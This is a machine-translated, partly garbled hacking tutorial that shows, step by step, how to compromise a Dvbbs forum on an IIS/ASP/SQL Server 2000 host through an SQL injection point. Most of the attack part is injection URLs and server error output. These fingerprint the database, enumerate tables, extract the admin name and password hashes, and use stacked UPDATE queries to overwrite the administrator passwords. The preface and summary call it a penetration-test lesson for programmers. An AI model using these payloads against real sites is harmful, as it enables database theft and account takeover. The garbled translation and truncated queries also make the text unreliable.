Edit preface: I have no testing this article, but the premise is still a lot, such as having some other programs exists, but also use the same SQL Server library, but also assume that the injection vulnerability. It is nothing to do with the bottom and mobile network, but because the openness of the mobile network forum is familiar with its database structure, and procedures. Take administrative privileges in a step attack, then upgrade the permissions, if just the database is the SA account, it is more trouble. It is because of the assumptions of these conditions, so everyone does not have to be too nervous, and it is provided in many ideal intrusion in many ideal, and the security vulnerability is reduced in programming is to pay attention to each of our programmers. When the webmaster uses multiple programs in combination, they should pay attention to security and program integrity. There are also 2-3 times of the multi-purpose network 7.0 SP2 I have learned, so everyone should pay attention to the upgrade, and perform permission settings in detail. It's not good to say that the opening of his program is a lot of people, there are a lot of people, and there will be a lot of BUG. The software is said, the more BUG will be. Relatively, I like to customize the developed procedures, which will be safe. Below is the latest version of the sixth boy now is 7.0 SP2. It should be said that safety is already very high. So from the script itself to break through it. It is difficult to do. But we can indirect "to" to "moving network from some ways. Now the combination of IIS ASP SQL2000 is more common. And a website uses a lot of ASP script, which is inevitably not leaking. If there is a SQL injection point on a host, this host is equipped with a moving network SQL version, basically can be concluded: this network is yours. Let's take a look at the example. First, first determine the goal. Suppose the following URL is in SQL injection:
Program code: [Copy code to clipboard]
Http://www.loveyou.com/type.asp?id=6 Test can be injected to add a single quotation number after 6.
http://www.loveyou.com/type.aspid=6 '
Return error tips:
Microsoft
OLE DB Provider for ODBC Drivers Errors '80040e14' [
Microsoft
] [ODBC SQL Server Driver] [SQL Server] string '' has no closed quotation marks before.
Continue, first detect the system version:
Program code: [Copy code to clipboard]
http://www.loveyou.com/type.asp?id= (select @@ version) - Returns:
Microsoft
OLE DB Provider for ODBC Drivers Errors '80040E07' [
Microsoft
] [ODBC SQL Server Driver] [SQL Server] Put nvarChar value '
Microsoft
SQL Server 2000 - 8.00.760 (
Intel
X86) DEC 17 2002 14:22:05 CopyRight (c) 1988-2003
Microsoft
Corporation Standard Edition On Windows NT 5.0 (Build 2195: Service Pack 4) The syntax error occurs when converted to a column of data type INT. It seems that the latest SP4 patch has been placed.
Get the current connection database user:
Program code: [Copy code to clipboard]
http://www.loveyou.com/type.asp?id= (Select User_Name ()) - Back: Microsoft
OLE DB Provider for ODBC Drivers Errors '80040E07' [
Microsoft
] [ODBC SQL Server Driver] [SQL Server] transitions nvarChar value 'WebUser' to a quotient error when the data type INT is intended. Get the current database users from the error message: Webuser
Get the current connection database name:
Program code: [Copy code to clipboard]
http://www.loveyou.com/type.asp?id= (SELECT DB_NAME ()) - Returns:
Microsoft
OLE DB Provider for ODBC Drivers Errors '80040E07' [
Microsoft
] [ODBC SQL Server Driver] [SQL Server] transitions nvarChar value '01city' to a syntax error when the data type Int is int. Get the current database from the error message: 01city
Next, the permissions are tested: (Note: Because our purpose is to get the network instead of the system. Therefore, database permissions are not very important to us.)
Program code: [Copy code to clipboard]
http://www.loveyou.com/Type.asp?id= (Select Is_SrvroleMember) - Returns an error message. Tip The current record has been deleted. It seems that the permissions are not very high. carry on,
http://www.loveyou.com/type.asp?id= (S ... ('db_owner')) -
Normal display information, it seems that the permissions owned by the connection database are DB_OWNER (Down database owner. But the manipulation data is more than enough.
2. Get the name of the database. The various tables of the unexpected mobile network exist in the current database 01city. First get the first table:
Program code: [Copy code to clipboard]
http://www.loveyou.com/type.asp?id= (select Top 1 Name from sysobjects where xtype = 'u' and status> 0 and name not in ('')) - Back: [
Microsoft
] [ODBC SQL Server Driver] [SQL Server] transitions nvarChar value 'address' to a quotient error when the data type Int is int. Ok, the first table name is: Address continues,
http://www.loveyou.com/type.asp?id= (select Top 1 Name from sysobjects whe ... US> 0 and name not in ('address')) -
Returns: The second table name of Admin is also coming out. Push it, submit:
http://www.loveyou.com/type.asp?id= (select Top 1 Name from sysobjects w ... Tatus> 0 and name not in ('address "
, 'Admin', ...) -
You can get all the table names in the current database. After a while, the result came out, the name is good. "Address", "admin", "bbslink", "bbsnews", "board", "user" ......... The fool looks out this is the table of moving network. Of course there are some other tables, we don't take it. Just do it, don't guess the fields, we will open your own network database and look at it. Since there is a table name, the field name, then, is the mobile phone is not under your master? But don't do Drop Table. It's not good to destroy. Our goal is to exercise technology and improve the level. Ok, then, we went to get the background of the mobile network. Third, enter the background, and obtain the power network forum administrator privileges. Program code: [Copy code to clipboard]
Let's see how many administrators in the background:
http://www.loveyou.com/type.asp?id=6 and 4 ... sername) from admin) -
Return error: The current record has been deleted. Explain that the administrator is less than 4 digits. Submit directly,
http://www.loveyou.com/type.asp?id=6 and 1 ... sername) from admin) -
Normal display information, it seems that the administrator only has one, read the administrator name,
http://www.loveyou.com/type.asp?id= (sele ... from admin) -
Out, the administrator's background login name is: 01CITY Continue to read the administrator background login password:
http://www.loveyou.com/type.asp?id= (sele ... from admin) -
It's very smooth, the password is: E7CC01BE0E33A273 is MD5 encrypted. Do you want to crack it? Don't worry, don't need to break the MD5 password at all. Since the background management is a cookie session authentication. Therefore, only the administrator will be managed in the front desk to enter the background management, and the general user cannot be managed in the back. Even if the background users and passwords know it. So we have to get the user and password managed by the front desk. This is easy, register a user in his forum to check the management team, draw, the front desk management users are: admin
Ok, get his password:
Program code: [Copy code to clipboard]
http://www.loveyou.com/Type.asp?id= (select userpassword from user where username = 'admin') - Returns, the front desk password of Admin is: E7CC01BE0E33A273 is also MD5. Now use the cookie spoof to manage it to manage it. But is there any other way? Don't forget that now we have a blend of blending on its database. Smart, you may think of it, right, is Update. Let's submit:
http://www.loveyou.com/type.asp?id=6 ;Update User Set Userpa ... 39; WHERE UserName = 'Admin'
; - Normal return information, should be successfully executed, check out:
http://www.loveyou.com/type.asp?id= (select userpassword ") - The return value is: 49ba59abbe56e057 Change the password success, explain that this 16-bit MD5 is a pre-calculated Ok. You have to know its plain text password. Then, we change the management password in the background. First change the background user as the front desk user, submit:
http://www.loveyou.com/type.asp?id=6 ;Update Admin set ... sp; where username = '01city'
Check out:
Program code: [Copy code to clipboard]
http://www.loveyou.com/type.asp?id= (select username from admin) - Change success, the background administrator now has changed: admin Next change the password, submit:
http://www.loveyou.com/type.asp?id=6 ;Update Admin set passw ...; where username = 'admin'
Check out:
Program code: [Copy code to clipboard]
http://www.loveyou.com/Type.asp?id= (select password from admin) - Change success, the background administrator password has become: 49ba59abbe56e057
So far, the moving network has been completely fallen. You can use the admin to log in the front desk and then use the same password to enter the background. Fourth, the summary is not too difficult to implement the control of the on-action network. Through this kind of good penetration test, it also exposes terribleity of SQL Injection attack. And the virtual host for IIS ASP SQL2000 is simply anti-fighting. As long as there is a SQL injection point on the host, the mobile network will face the disaster of the top. In fact, it is not difficult to find such a SQL injection point from the large website program of the server. It should be marked with an old saying: a thousand miles of embankment, collapsed in the ant hole. Therefore, the best way to prevent such an attack is to enhance the security of the program code. Safety is a whole, any subtle mistakes may result in serious consequences.
